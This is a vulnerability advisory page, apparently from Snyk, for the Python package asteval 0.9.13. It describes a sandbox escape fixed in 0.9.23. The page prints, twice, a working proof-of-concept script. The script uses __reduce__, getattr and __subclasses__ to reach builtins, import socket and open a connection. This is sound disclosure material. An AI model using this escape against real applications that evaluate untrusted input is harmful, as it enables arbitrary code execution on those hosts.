asteval@0.9.13 vulnerabilities

Safe, minimalistic evaluator of python expression using ast module

latest version

1.0.5

latest non vulnerable version

1.0.5

first published

12 years ago

latest version published

3 months ago

licenses detected

MIT
[0.9.11,)

View asteval package health on Snyk Advisor (opens in a new tab)

Go back to all versions of this package

Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the asteval package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free

Vulnerability Vulnerable Version

Vulnerability	Vulnerable Version
H Sandbox Escape asteval is a Safe, minimalistic evaluator of python expression using ast module Affected versions of this package are vulnerable to Sandbox Escape. It is possible to escape the `asteval` sandbox using `reduce` and `reduce_ex`. PoC #!/usr/bin/env python3 # asteval "sandbox" escape PoC # Ross Bradley import asteval user_input = ''' # reduce the asteval.Interpreter._printer function, returning a tuple red = print.__reduce__() print(red) # red[0] == getattr, red[1][0] == asteval.Interpreter instance) # this is the crux of the issue - access to getattr breaks all security assumptions allowing us to access props we shouldn't be able to # give them nice names to make the following code a little clearer getattr = red[0] inst = red[1][0] # get the class for the asteval.Interpreter instance cls = getattr(inst, '__class__') # get an object instance from the class obj = getattr(cls, '__base__') subclasses = getattr(obj, '__subclasses__') # find the catch_warnings type cw = [c for c in subclasses() if c.__name__ == 'catch_warnings'][0] # fetch the reference to builtins from the catch_warnings type bi = cw()._module.__builtins__ # import socket (wait, what?) socket = bi['__import__']('socket') # do socket things s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('localhost', 1234)) s.send(b'arbitrary code execution') s.close() ''' interpreter = asteval.Interpreter() interpreter.eval(user_input) How to fix Sandbox Escape? Upgrade `asteval` to version 0.9.23 or higher.	[,0.9.23)

Sandbox Escape

asteval is a Safe, minimalistic evaluator of python expression using ast module

Affected versions of this package are vulnerable to Sandbox Escape. It is possible to escape the asteval sandbox using reduce and reduce_ex.

PoC

#!/usr/bin/env python3
# asteval "sandbox" escape PoC
# Ross Bradley

import asteval

user_input = '''
# reduce the asteval.Interpreter._printer function, returning a tuple
red = print.__reduce__()
print(red)

# red[0] == getattr, red[1][0] == asteval.Interpreter instance)
#  this is the crux of the issue - access to getattr breaks all security assumptions allowing us to access props we shouldn't be able to

# give them nice names to make the following code a little clearer
getattr = red[0]
inst = red[1][0]

# get the class for the asteval.Interpreter instance
cls = getattr(inst, '__class__')

# get an object instance from the class
obj = getattr(cls, '__base__')
subclasses = getattr(obj, '__subclasses__')

# find the catch_warnings type
cw = [c for c in subclasses() if c.__name__ == 'catch_warnings'][0]

# fetch the reference to builtins from the catch_warnings type
bi = cw()._module.__builtins__

# import socket (wait, what?)
socket = bi['__import__']('socket')

# do socket things
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 1234))
s.send(b'arbitrary code execution')
s.close()
'''

interpreter = asteval.Interpreter()
interpreter.eval(user_input)

How to fix Sandbox Escape?

Upgrade asteval to version 0.9.23 or higher.

[,0.9.23)

Go back to all versions of this package